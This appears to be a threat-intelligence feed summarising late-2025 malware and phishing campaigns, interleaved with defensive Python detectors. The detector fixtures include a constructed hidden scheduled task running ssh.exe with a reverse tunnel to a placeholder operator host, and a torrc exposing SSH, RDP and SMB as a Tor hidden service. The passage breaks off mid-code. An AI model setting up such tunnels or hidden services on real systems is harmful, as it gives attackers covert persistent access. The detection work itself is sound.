Threat Research Feed

2025-11-08
Windows_SSH_backdoor
MEDIUM
Intel Source:
Twitter
Intel Name:
Windows_SSH_backdoor
Date of Scan:
2025-11-08
Impact:
MEDIUM
Summary:
PRODAFT researchers have identified that the FIN7 threat group, also known as Savage Ladybug, is actively deploying a Windows-based SSH backdoor to maintain persistent access and exfiltrate data from enterprise systems. The campaign uses legitimate OpenSSH components together with a batch script that automates deployment and establishes covert channels between compromised hosts and attacker-controlled servers. Because the implant speaks standard SSH, FIN7 can hold encrypted reverse SSH and SFTP connections that blend with legitimate administrative traffic, which makes detection difficult. The backdoor supports persistent remote access, lateral movement, and data theft while leaving few forensic traces in security logs.
Source: https://x.com/PRODAFT/status/1985731361492050255
2025-11-07
Beast_Ransomware_Hidden_in_GUI
LOW
Intel Source:
ASEC researchers
Intel Name:
Beast_Ransomware_Hidden_in_GUI
Date of Scan:
2025-11-07
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) analyzed a newly emerging ransomware group called Beast, which evolved from the Monster ransomware family. The Beast group began operating as a Ransomware-as-a-Service (RaaS) in February 2025 and launched their Tor-based leak site (“Beast Leaks”) in July 2025. As of August 2025, they had publicly named 16 victims across North America, Europe, Asia, and Latin America, targeting multiple sectors such as manufacturing, construction, healthcare, education, and business services. Beast ransomware stands out for its technical sophistication, interactive GUI interface, and advanced anti-recovery mechanisms, making decryption nearly impossible without the attackers’ key.
Source: https://asec.ahnlab.com/en/90792/
2025-11-07
Rhadamanthys_Malware
LOW
Intel Source:
ASEC researchers
Intel Name:
Rhadamanthys_Malware
Date of Scan:
2025-11-07
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) identified a new distribution method for the Rhadamanthys infostealer, a well-known malware family that steals credentials, cryptocurrency wallets, browser data, and system information. In this campaign, threat actors disguise Rhadamanthys as a visual novel game built with Ren’Py, a Python-based open-source game engine used by indie developers whose titles are sold on platforms such as Steam. The attackers embed the malware in the game’s script files, so when users run what appears to be a harmless game executable, the loader activates and installs Rhadamanthys in the background. The campaign leverages social engineering and gaming communities (especially free-game forums and file-sharing sites such as MediaFire) to infect unsuspecting users.
Source: https://asec.ahnlab.com/en/90767/
2025-11-07
Kimsuky_JavaScript_Dropper_Analysis
HIGH
Intel Source:
Pulsedive
Intel Name:
Kimsuky_JavaScript_Dropper_Analysis
Date of Scan:
2025-11-07
Impact:
HIGH
Summary:
Researchers at Pulsedive Threat Research have identified a new Kimsuky intrusion chain leveraging a JavaScript-based dropper to establish persistence and exfiltrate system information from Windows hosts. The investigation revealed that the dropper executes multiple stages, beginning with a lightweight JavaScript file responsible for retrieving and executing additional payloads from adversary infrastructure. The subsequent stage performs host reconnaissance by collecting system configuration details, running processes, and directory listings, which are then compressed and transmitted to the attacker’s command server. The malware further modifies Windows registry keys and creates scheduled tasks to maintain continuous execution, ensuring the dropper remains active even after reboot.
Source: https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper/
2025-11-06
ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire
LOW
Intel Source:
AhnLab Security Intelligence Center
Intel Name:
ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire
Date of Scan:
2025-11-06
Impact:
LOW
Summary:
Researchers at ASEC discovered that the Kinsing (also known as H2Miner) threat actor is exploiting the Apache ActiveMQ vulnerability (CVE-2023-46604) to infect both Linux and Windows systems. The attackers use this flaw to remotely install several malware families, including XMRig (cryptominer), Sharpire (.NET backdoor), Cobalt Strike, and Meterpreter for system control and post-exploitation. This marks a shift in Kinsing’s activity, from simple cryptocurrency mining to full system compromise and remote control, making it a more serious and versatile threat.
Source: https://asec.ahnlab.com/en/90811/
2025-11-06
Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit
HIGH
Intel Source:
Cybereason
Intel Name:
Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit
Date of Scan:
2025-11-06
Impact:
HIGH
Summary:
Researchers at Cybereason have analyzed Tycoon 2FA, a Phishing-as-a-Service (PhaaS) kit active since August 2023 that uses a reverse-proxy Adversary-in-the-Middle (AiTM) technique to bypass MFA/2FA on Microsoft 365 and Google (Gmail) accounts, intercepting credentials and session cookies in real time for full account compromise. The kit delivers phishing links via PDFs, PowerPoint and SVG files, and malicious websites often hosted on cloud platforms (Amazon S3, Dropbox, Canva), and performs domain, CAPTCHA, debugger, and bot checks before redirecting in order to evade automated analysis. Its multi-stage JavaScript chain layers base64, XOR, and AES-encrypted code with CryptoJS-driven dynamic decryption, heavy obfuscation, and memory-only execution; it gathers user-agent and geolocation data, encrypts that data with hardcoded AES keys, and transmits it via AJAX POSTs to attacker-controlled C2 endpoints. The AiTM proxy relays credentials to the legitimate service while rendering authentic error messages and MFA prompts, so the phishing flow is nearly indistinguishable from a real login, and the kit adapts each attack to the victim’s authentication policy.
Source: https://www.cybereason.com/blog/tycoon-phishing-kit-analysis
2025-11-06
SleepyDuck_VSX_Ethereum_Based_C2_Malware
HIGH
Intel Source:
Cyberwarzone
Intel Name:
SleepyDuck_VSX_Ethereum_Based_C2_Malware
Date of Scan:
2025-11-06
Impact:
HIGH
Summary:
Researchers at Secure Annex have identified a malicious Visual Studio Extension (VSX) known as SleepyDuck that employs the Ethereum blockchain for command-and-control (C2) operations. Distributed through the Open VSX registry under the guise of a legitimate Solidity development tool, the extension was modified in early November 2025 to include remote access trojan capabilities. Once installed, SleepyDuck connects to Ethereum smart contracts to dynamically update its C2 configuration, making takedown and detection significantly more difficult. The malware periodically polls for new commands, exfiltrates host and user information, and maintains fallback mechanisms using multiple Ethereum Remote Procedure Call (RPC) endpoints to ensure persistence.
Source: https://cyberwarzone.com/2025/11/04/malicious-vsx-extension-sleepyduck-leverages-ethereum-for-command-and-control/
2025-11-05
SSH_Tor_Backdoor_Target_Defence_Sector
MEDIUM
Intel Source:
Cyble
Intel Name:
SSH_Tor_Backdoor_Target_Defence_Sector
Date of Scan:
2025-11-05
Impact:
MEDIUM
Summary:
Researchers at Cyble have identified a phishing campaign that deploys an SSH-over-Tor backdoor via military-themed lures and weaponized archives. The attack chain is initiated by a malicious .LNK shortcut that executes PowerShell, performs environment checks, stages additional payloads, and then presents benign-appearing decoy documents to minimize detection. Following installation, the implant establishes persistence through a scheduled task and installs OpenSSH alongside Tor components to conceal C2 infrastructure within Tor hidden services. Operators then expose multiple services—SSH, RDP, SMB and SFTP—over those hidden services, enabling full remote administration, credential harvesting, data staging and exfiltration, and lateral movement across the compromised environment.
Source: https://cyble.com/blog/weaponized-military-documents-deliver-backdoor/
2025-11-05
Phishing_Campaign_Targets_NPM_Developers
HIGH
Intel Source:
Group-IB
Intel Name:
Phishing_Campaign_Targets_NPM_Developers
Date of Scan:
2025-11-05
Impact:
HIGH
Summary:
Group-IB researchers uncovered a phishing-based supply chain attack targeting the NPM ecosystem. The campaign began when threat actors compromised a developer’s NPM account by luring them to a fraudulent NPM login portal disguised as a legitimate 2FA update notification. Once the attacker gained full access, they modified around 20 widely used NPM packages to inject a malicious JavaScript-based crypto-clipper. The malware covertly monitored browser and application activity to detect cryptocurrency transactions and replaced legitimate wallet addresses with those controlled by the attackers, affecting multiple cryptocurrencies including Bitcoin, Ethereum, Solana, Tron, Litecoin, and Bitcoin Cash. The phishing emails impersonated official NPM Support communications, passing SPF, DKIM, and DMARC checks while leveraging urgency to prompt user action. The compromised packages collectively received about 2.8 billion weekly downloads, underscoring the significant potential impact.
Source: https://www.group-ib.com/blog/detect-npm-supply-chain-attack/
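The practical defence against a package takeover of this kind is to pin dependencies through a lockfile and to diff that lockfile against a known-good baseline before every install, so that a version bump or a replaced tarball pushed under a hijacked maintainer account is caught rather than silently pulled. The following is an added example, not tooling from Group-IB or npm: it reads a constructed `package-lock.json` (lockfileVersion 3 layout, with its `packages` map and per-package `version`, `resolved` and `integrity` fields) and reports drift against a baseline. The package names, versions and integrity strings are placeholders and not the packages named in the report.

```python
import json

# Baseline captured from a known-good build: package -> (version, integrity).
# Constructed placeholder values; not the packages from the Group-IB report.
BASELINE = {
    "left-pad": ("1.3.0", "sha512-AAAAbaselineleftpad"),
    "chalk": ("5.3.0", "sha512-AAAAbaselinechalk"),
}

# Constructed package-lock.json in the lockfileVersion 3 layout. One package was
# bumped to a new version with a new tarball, and one new package arrived from a
# non-registry URL; both are the symptoms of a hijacked maintainer account.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"left-pad": "^1.3.0", "chalk": "^5.3.0"}},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-AAAAbaselineleftpad",
        },
        "node_modules/chalk": {
            "version": "5.3.1",
            "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.3.1.tgz",
            "integrity": "sha512-BBBBdifferent",
        },
        "node_modules/tiny-helper": {
            "version": "0.0.1",
            "resolved": "https://mirror.example.invalid/tiny-helper-0.0.1.tgz",
            "integrity": "sha512-CCCCnew",
        },
    },
})

TRUSTED_REGISTRY = "https://registry.npmjs.org/"


def package_name(path):
    # "node_modules/@scope/name" or "node_modules/a/node_modules/b" -> innermost package.
    return path.split("node_modules/")[-1]


def lockfile_drift(lock_text, baseline=BASELINE, trusted=TRUSTED_REGISTRY):
    """Compare a package-lock.json against a (version, integrity) baseline.

    Returns a list of human-readable findings; an empty list means no drift."""
    lock = json.loads(lock_text)
    if lock.get("lockfileVersion", 0) < 2:
        raise ValueError("need lockfileVersion >= 2 (the format with a 'packages' map)")
    findings = []
    seen = set()
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project entry, not a dependency
            continue
        name = package_name(path)
        seen.add(name)
        version = meta.get("version")
        integrity = meta.get("integrity")
        resolved = meta.get("resolved", "")
        if resolved and not resolved.startswith(trusted):
            findings.append(f"{name}: resolved from untrusted source {resolved}")
        if name not in baseline:
            findings.append(f"{name}@{version}: not in baseline (new dependency)")
            continue
        base_version, base_integrity = baseline[name]
        if version != base_version:
            findings.append(f"{name}: version changed {base_version} -> {version}")
        elif integrity != base_integrity:
            # Same version string but a different tarball hash: the published
            # artifact was replaced, which a version-only check would miss.
            findings.append(f"{name}@{version}: integrity changed (same version, different tarball)")
    for name in sorted(set(baseline) - seen):
        findings.append(f"{name}: present in baseline but missing from lockfile")
    return findings


if __name__ == "__main__":
    for line in lockfile_drift(SAMPLE_LOCK):
        print(line)
```

Run this as a CI gate in front of `npm ci`; anything it reports should be reviewed by a human before the install proceeds, and the baseline is only updated after that review.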
2025-11-05
MuddyWater_Phoenix_v4_Espionage_Campaign
HIGH
Intel Source:
Polyswarm
Intel Name:
MuddyWater_Phoenix_v4_Espionage_Campaign
Date of Scan:
2025-11-05
Impact:
HIGH
Summary:
Researchers at PolySwarm have identified a new cyber-espionage campaign attributed to the Iran-linked APT MuddyWater, which is actively targeting government entities across the Middle East and North Africa. The operation employs phishing emails sent from compromised accounts accessed via NordVPN, delivering macro-enabled Word documents that execute a FakeUpdate injector to deploy the Phoenix backdoor version 4. Once executed, the malware establishes persistence through Winlogon registry modifications and enables remote access for data exfiltration and command execution. Analysis indicates that the attackers leverage Chromium-based credential stealers and remote monitoring tools such as PDQ and Action1, hosted on the same infrastructure, to maintain access and facilitate post-exploitation activities. Overlaps in macro code, C2 infrastructure, and tool usage link this operation to historical MuddyWater campaigns tied to Iran’s Ministry of Intelligence and Security (MOIS).
Source: https://blog.polyswarm.io/muddywater-targets-mena-governments-with-phoenix-backdoor
2025-11-04
Operation_Peek_a_Baku_Targets_Central_Asia
HIGH
Intel Source:
Seqrite
Intel Name:
Operation_Peek_a_Baku_Targets_Central_Asia
Date of Scan:
2025-11-04
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have identified a new espionage campaign, Operation Peek-a-Baku, orchestrated by Silent Lynx, a Central Asia–focused APT group also known as YoroTrooper and ShadowSilk. Active since at least 2024, the group continues to target diplomatic, government, and infrastructure entities across Tajikistan, Azerbaijan, Russia, and China, demonstrating continuity in tooling with only marginal tradecraft evolution—such as shifting encoded payloads from binaries to GitHub-hosted PowerShell scripts. The campaign relies on spear-phishing emails delivering RAR archives containing LNK files that execute malicious PowerShell reverse shells, deploying payloads like Silent Loader, SilentSweeper, and Laplas implants, which leverage TCP and TLS reverse shells for persistent command execution. The attackers also use Ligolo-ng tunneling to sustain covert network access. Targeting aligns with significant diplomatic summits and projects, including the Russia–Azerbaijan meeting in Dushanbe (October 2025) and the China–Central Asia Summit in Astana (June 2025), reflecting an intelligence-gathering motive focused on strategic communications and infrastructure.
Source: https://www.seqrite.com/blog/operation-peek-a-baku-silent-lynx-apt-dushanbe-espionage/
2025-11-03
DPRK_Clusters_HttpTroy_and_BLINDINGCAN_Evolution
HIGH
Intel Source:
Gen Digital
Intel Name:
DPRK_Clusters_HttpTroy_and_BLINDINGCAN_Evolution
Date of Scan:
2025-11-03
Impact:
HIGH
Summary:
Researchers at Gen Digital Threat Labs have identified two concurrent campaigns conducted by DPRK-linked threat clusters Kimsuky and Lazarus, highlighting significant evolution in their shared tradecraft. Kimsuky executed an espionage-focused operation using a multi-stage intrusion chain beginning with a phishing-delivered archive that deployed the lightweight loader MemLoad and the fully featured backdoor HttpTroy. This toolset enabled persistent remote access, in-memory payload execution, and command-and-control over encrypted HTTP channels, demonstrating refined operational discipline.
Source: https://www.gendigital.com/blog/insights/research/dprk-kimsuky-lazarus-analysis
2025-11-03
COLDRIVER_New_Malware_Toolset_Expansion
HIGH
Intel Source:
Polyswarm
Intel Name:
COLDRIVER_New_Malware_Toolset_Expansion
Date of Scan:
2025-11-03
Impact:
HIGH
Summary:
Researchers at PolySwarm have identified a significant evolution in the Russian state-sponsored group COLDRIVER’s malware arsenal, featuring the introduction of three new families: NOROBOT, YESROBOT, and MAYBEROBOT. The shift followed the public exposure of the LOSTKEYS malware in May 2025 and reflects COLDRIVER’s ongoing focus on evading detection while maintaining aggressive intelligence collection operations. The group’s infection chain now begins with a deceptive “ClickFix” lure masquerading as a CAPTCHA verification, executing malicious DLL payloads through rundll32. NOROBOT serves as the initial downloader with advanced cryptography and modular staging, while YESROBOT, a Python-based backdoor, and MAYBEROBOT, a PowerShell variant, demonstrate COLDRIVER’s agile development approach and emphasis on flexible persistence.
Source: https://blog.polyswarm.io/coldriver-updates-its-arsenal
2025-11-03
Operation_SkyCloak
HIGH
Intel Source:
Seqrite
Intel Name:
Operation_SkyCloak
Date of Scan:
2025-11-03
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have uncovered a new espionage campaign, dubbed Operation SkyCloak, targeting military personnel in Russia and Belarus, including members of the Russian Airborne Forces (VDV) and Belarusian Special Forces. The operation uses spearphishing attachments disguised as official military documents to deliver a multi-stage PowerShell-based stager that deploys a customized OpenSSH server over Tor hidden services, exposing SSH, SMB, and RDP interfaces through obfs4 bridges for covert remote access. The infection chain begins with malicious .LNK files posing as PDFs, which execute embedded PowerShell commands to extract archives and establish persistence through hidden scheduled tasks that repurpose legitimate Windows binaries as SSH and SFTP servers. Each stage is heavily obfuscated and incorporates anti-sandbox checks to evade automated detection. The campaign’s Tor bridge infrastructure is distributed across Germany, France, Poland, and Canada, demonstrating a high degree of operational sophistication. While attribution remains uncertain, Seqrite notes tactical overlaps with Eastern European espionage groups and similarities to pro-Ukraine APT clusters such as Angry Likho and Awaken Likho.
Source: https://www.seqrite.com/blog/operation-skycloak-tor-campaign-targets-military-of-russia-belarus/
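Three entries in this feed (the FIN7 Windows SSH backdoor, the Cyble SSH-over-Tor backdoor, and Operation SkyCloak) describe the same persistence shape: a scheduled task that launches a copy of OpenSSH or Tor from a user-writable directory, with SSH opening a reverse tunnel or Tor publishing SSH/RDP/SMB as a hidden service. The following is an added example serving all three entries; it is not code or IOCs from PRODAFT, Cyble or Seqrite. It parses a constructed Task Scheduler export (the XML that `schtasks /Query /XML` emits, minus the declaration) and a constructed `torrc`, and reports the traits a hunt query should key on. Paths, hostnames, ports and the bridge line are made up.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (real); a real export is UTF-16 with an XML
# declaration, so read the file with encoding="utf-16" before parsing.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task export: hidden logon-triggered task running ssh.exe from
# AppData with a reverse tunnel (-R) back to an operator host.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\svc\ssh.exe</Command>
      <Arguments>-N -R 2222:127.0.0.1:22 -i C:\Users\user\AppData\Roaming\svc\id_rsa -o StrictHostKeyChecking=no ops@203.0.113.10</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed torrc: obfs4 bridge plus a hidden service that forwards the Tor
# virtual ports to the local SSH, RDP and SMB listeners.
SAMPLE_TORRC = r"""
UseBridges 1
ClientTransportPlugin obfs4 exec C:\Users\user\AppData\Roaming\svc\lyrebird.exe
Bridge obfs4 203.0.113.20:443 0000000000000000000000000000000000000000 cert=placeholder iat-mode=0
HiddenServiceDir C:\Users\user\AppData\Roaming\svc\hs
HiddenServicePort 22 127.0.0.1:22
HiddenServicePort 3389 127.0.0.1:3389
HiddenServicePort 445 127.0.0.1:445
HiddenServicePort 8022 127.0.0.1:22
"""

REMOTE_ACCESS_BINS = {"ssh.exe", "sshd.exe", "sftp-server.exe", "tor.exe", "plink.exe"}
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Public|Downloads)\\", re.I)
EXPOSED_PORTS = {22: "ssh", 445: "smb", 3389: "rdp"}


def task_findings(xml_text):
    """Traits of one scheduled task that match the SSH/Tor backdoor pattern."""
    root = ET.fromstring(xml_text)
    findings = []
    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS)
    if hidden.strip().lower() == "true":
        findings.append("task is hidden from the Task Scheduler UI")
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        name = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if name in REMOTE_ACCESS_BINS:
            findings.append(f"launches remote-access binary {name}")
            if USER_WRITABLE.search(cmd):
                findings.append(f"{name} runs from a user-writable path: {cmd}")
        if re.search(r"(?:^|\s)-R\s", args):
            findings.append("ssh -R: reverse tunnel back to a remote host")
        if re.search(r"StrictHostKeyChecking=no", args, re.I):
            findings.append("host key checking disabled")
    return findings


def torrc_findings(text):
    """Traits of a torrc that expose local admin services as a hidden service."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        key, args = parts[0].lower(), parts[1:]
        if key == "hiddenserviceport" and args:
            # HiddenServicePort VIRTPORT [TARGET]; TARGET may be host:port or just a port
            target = args[1] if len(args) > 1 else args[0]
            try:
                port = int(target.rsplit(":", 1)[-1])
            except ValueError:
                continue  # unix: socket targets are not what we hunt for here
            label = EXPOSED_PORTS.get(port)
            if label:
                findings.append(f"hidden service port {args[0]} forwards to local {label} (port {port})")
        elif key == "usebridges" and args and args[0] == "1":
            findings.append("Tor configured to use bridges")
        elif key == "clienttransportplugin" and "obfs4" in args:
            findings.append("obfs4 transport hides Tor traffic from protocol detection")
    return findings


if __name__ == "__main__":
    print("\n".join(task_findings(SAMPLE_TASK_XML)))
    print("\n".join(torrc_findings(SAMPLE_TORRC)))
```

On a live host the same two checks map to `schtasks /Query /XML` over every task plus a search for `torrc` files outside the Tor Browser install; an `ssh.exe` that is not `C:\Windows\System32\OpenSSH\ssh.exe`, or any `HiddenServicePort` pointing at 22, 445 or 3389, is worth an incident ticket on its own.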
2025-11-03
TruffleNet_Cloud_Credential_Abuse_Campaign
HIGH
Intel Source:
Fortinet
Intel Name:
TruffleNet_Cloud_Credential_Abuse_Campaign
Date of Scan:
2025-11-03
Impact:
HIGH
Summary:
Researchers at FortiGuard Labs have identified a large-scale cloud abuse campaign dubbed TruffleNet, which exploits compromised Amazon Web Services (AWS) credentials to conduct reconnaissance and facilitate Business Email Compromise (BEC) operations. The threat actors used the open-source tool TruffleHog to automate credential validation and enumeration across AWS environments, focusing particularly on the Simple Email Service (SES) for sending spoofed messages from verified domains. Once access was confirmed, the attackers created fraudulent email identities using stolen DKIM keys from compromised web servers to impersonate trusted organizations and execute targeted financial fraud. The infrastructure supporting TruffleNet spanned hundreds of cloud hosts across multiple providers, orchestrated using Portainer for scalable coordination.
Source: https://www.fortinet.com/blog/threat-research/cloud-abuse-at-scale
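The recon-then-setup sequence described above leaves a recognisable trail in CloudTrail: a freshly used access key validates itself, immediately enumerates SES sending limits, and then registers a new sending identity. The following is an added example, not FortiGuard's detection logic or data: it scans constructed CloudTrail records (the AWS action names are real; the key IDs, IPs, timestamps and domain are made up) and flags any key whose `GetCallerIdentity` is followed within a short window by SES enumeration, reporting any identities it went on to create.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed CloudTrail records (subset of fields). Key 0001 shows the
# validate -> enumerate SES -> create identity sequence; key 0002 is routine.
SAMPLE_EVENTS = [
    {"eventTime": "2025-11-01T09:00:05Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "userIdentity": {"accessKeyId": "AKIAEXAMPLE0001"},
     "sourceIPAddress": "203.0.113.5", "userAgent": "aws-cli/2.15.0"},
    {"eventTime": "2025-11-01T09:00:07Z", "eventSource": "ses.amazonaws.com",
     "eventName": "GetSendQuota", "userIdentity": {"accessKeyId": "AKIAEXAMPLE0001"},
     "sourceIPAddress": "203.0.113.5", "userAgent": "aws-cli/2.15.0"},
    {"eventTime": "2025-11-01T09:00:09Z", "eventSource": "ses.amazonaws.com",
     "eventName": "GetAccount", "userIdentity": {"accessKeyId": "AKIAEXAMPLE0001"},
     "sourceIPAddress": "203.0.113.5", "userAgent": "aws-cli/2.15.0"},
    {"eventTime": "2025-11-01T09:03:00Z", "eventSource": "ses.amazonaws.com",
     "eventName": "CreateEmailIdentity", "userIdentity": {"accessKeyId": "AKIAEXAMPLE0001"},
     "sourceIPAddress": "203.0.113.77", "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"emailIdentity": "billing.example.invalid"}},
    {"eventTime": "2025-11-01T10:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "userIdentity": {"accessKeyId": "AKIAEXAMPLE0002"},
     "sourceIPAddress": "198.51.100.9", "userAgent": "aws-sdk-go/1.44"},
]

# SES calls that only answer "can this key send mail, and how much?"
SES_RECON = {"GetSendQuota", "GetAccount", "ListIdentities", "ListEmailIdentities",
             "GetIdentityVerificationAttributes"}
# SES calls that set up a new sender (identity, DKIM, configuration set)
SES_SETUP = {"CreateEmailIdentity", "VerifyDomainIdentity", "VerifyEmailIdentity",
             "VerifyDomainDkim", "PutEmailIdentityDkimSigningAttributes", "CreateConfigurationSet"}
WINDOW = timedelta(minutes=10)


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def ses_abuse_findings(events, window=WINDOW):
    """Per access key: GetCallerIdentity followed by SES recon inside `window`."""
    by_key = defaultdict(list)
    for e in sorted(events, key=lambda e: e["eventTime"]):
        by_key[e["userIdentity"].get("accessKeyId", "?")].append(e)
    findings = []
    for key, evs in by_key.items():
        for probe in (e for e in evs if e["eventName"] == "GetCallerIdentity"):
            t0 = parse_time(probe["eventTime"])
            follow = [e for e in evs
                      if e["eventSource"] == "ses.amazonaws.com"
                      and t0 < parse_time(e["eventTime"]) <= t0 + window]
            recon = sorted({e["eventName"] for e in follow if e["eventName"] in SES_RECON})
            if not recon:
                continue
            setup_events = [e for e in follow if e["eventName"] in SES_SETUP]
            identities = []
            for e in setup_events:
                p = e.get("requestParameters", {})
                ident = p.get("emailIdentity") or p.get("domain") or p.get("emailAddress")
                if ident:
                    identities.append(ident)
            findings.append({
                "accessKeyId": key,
                "probe_at": probe["eventTime"],
                "sourceIPs": sorted({e["sourceIPAddress"] for e in evs}),
                "ses_recon": recon,
                "ses_setup": sorted({e["eventName"] for e in setup_events}),
                "new_identities": identities,
            })
    return findings


if __name__ == "__main__":
    for f in ses_abuse_findings(SAMPLE_EVENTS):
        print(f)
```

The `sourceIPs` field is included because a leaked key is typically driven from hosts the legitimate owner never used; a key that appears from two unrelated addresses within minutes, as in the constructed sample, strengthens the finding. When this fires, revoke the key, delete any identity it created, and check SES sending statistics for mail already sent.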
2025-11-02
BRONZE_BUTLER_Exploits_LANSCOPE_Zero_Day
HIGH
Intel Source:
Sophos
Intel Name:
BRONZE_BUTLER_Exploits_LANSCOPE_Zero_Day
Date of Scan:
2025-11-02
Impact:
HIGH
Summary:
Researchers at Sophos have identified that the Chinese state-sponsored threat group BRONZE BUTLER (also known as Tick) exploited a zero-day vulnerability (CVE-2025-61932) in Motex LANSCOPE Endpoint Manager to exfiltrate sensitive data from Japanese organizations. The flaw enables remote command execution with SYSTEM privileges, facilitating privilege escalation and lateral movement once access is established. Although the number of exposed internet-facing systems is limited, the campaign underscores BRONZE BUTLER’s continued exploitation of Japanese enterprise software, consistent with its prior attacks on IT management tools such as SKYSEA Client View in 2016. In the latest 2025 intrusion wave, CTU identified the use of Gokcpdoor and Havoc C2 frameworks for remote control and persistence, with Gokcpdoor’s updated variant employing multiplexed C2 communications via third-party libraries and dropping KCP protocol support. The OAED Loader malware further enabled stealthy execution through process injection into legitimate executables. The group also leveraged legitimate tools including goddi, Remote Desktop, and 7-Zip for lateral movement and data exfiltration, while cloud services were accessed via browser-based remote sessions to transfer stolen information.
Source: https://news.sophos.com/en-us/2025/10/30/bronze-butler-exploits-japanese-asset-management-software-vulnerability/
2025-11-02
Midnight_Ransomware_Flawed_Babuk_Offshoot
MEDIUM
Intel Source:
Gen Digital
Intel Name:
Midnight_Ransomware_Flawed_Babuk_Offshoot
Date of Scan:
2025-11-02
Impact:
MEDIUM
Summary:
Researchers at Gen Digital have identified a new ransomware strain known as Midnight, which appears to be derived from the Babuk ransomware family but exhibits significant cryptographic flaws. Midnight retains Babuk’s overall structure and Ransomware-as-a-Service model, employing a combination of ChaCha20 and RSA encryption to lock victim data. However, implementation weaknesses in the cryptographic routines have made decryption possible under specific conditions, reducing the threat’s impact. The malware primarily targets large organizations in finance, healthcare, and government sectors, using configurable command-line arguments to control its encryption behavior and focusing on critical files such as backups and databases.
Source: https://www.gendigital.com/blog/insights/research/midnight-ransomware
2025-11-02
Attackers_Exploit_OAuth_to_Access_Microsoft_365
HIGH
Intel Source:
Unit 42
Intel Name:
Attackers_Exploit_OAuth_to_Access_Microsoft_365
Date of Scan:
2025-11-02
Impact:
HIGH
Summary:
Researchers at Palo Alto Networks have observed an active phishing campaign exploiting OAuth authorization flows to compromise Microsoft accounts through brand impersonation. The attackers mimic legitimate business and investment platforms such as SAP Concur and Vanguard Funds to deceive users into granting unauthorized access tokens, thereby enabling persistent access to Microsoft tenants without direct credential theft. Victims are lured to attacker-controlled sites that prompt them to paste device codes or approve malicious OAuth applications. In one variant, the SAP Concur impersonation uses a fake login domain to redirect users to the legitimate Microsoft OAuth endpoint, where entering a provided code silently links the victim’s account to an attacker-controlled device. In another, the Vanguard-themed campaign disguises a malicious OAuth authorization link within a PDF, redirecting access tokens to attacker-managed Azure storage endpoints. Both phishing sets share malicious domains hosted on Microsoft’s infrastructure, indicating coordinated use of attacker-owned Azure resources.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-10-23-OAuth-flow-phishing.txt
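Both variants above leave tenant-side evidence: a device-code sign-in completed from an address the user never uses, or a consent grant to a third-party application asking for mailbox or file access plus `offline_access` (the refresh token that makes the access persistent). The following is an added example, not Unit 42's detection or data: it runs over constructed records shaped like Microsoft Graph `signIn` and `directoryAudit` objects. The field names used (`authenticationProtocol`, `activityDisplayName`, `ConsentAction.Permissions`) are assumptions about that schema; every value, network range, user and application name is made up.

```python
import ipaddress
import re

# Address ranges sign-ins normally come from (constructed).
CORP_NETS = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed sign-in records: one ordinary OAuth2 sign-in from the corporate
# range, one device-code sign-in from an outside address.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "a.lee@example.com", "authenticationProtocol": "oAuth2",
     "ipAddress": "198.51.100.20", "appDisplayName": "Office 365 Exchange Online"},
    {"userPrincipalName": "a.lee@example.com", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.7", "appDisplayName": "Microsoft Authentication Broker"},
]

# Constructed audit records: one consent grant asking for mail, files and a
# refresh token, one asking only for basic profile, one unrelated event.
SAMPLE_AUDITS = [
    {"activityDisplayName": "Consent to application",
     "targetResources": [{"displayName": "Expense Sync"}],
     "modifiedProperties": [{"displayName": "ConsentAction.Permissions",
                             "newValue": "[[Scope: offline_access Mail.Read Files.Read.All ...]]"}]},
    {"activityDisplayName": "Consent to application",
     "targetResources": [{"displayName": "Lunch Poll"}],
     "modifiedProperties": [{"displayName": "ConsentAction.Permissions",
                             "newValue": "[[Scope: User.Read ...]]"}]},
    {"activityDisplayName": "Update user", "targetResources": [{"displayName": "a.lee@example.com"}],
     "modifiedProperties": []},
]

# Delegated permissions that let an app read or keep reading a user's data.
RISKY_SCOPES = {"offline_access", "Mail.Read", "Mail.ReadWrite", "Files.Read.All",
                "Files.ReadWrite.All", "User.Read.All", "Contacts.Read"}
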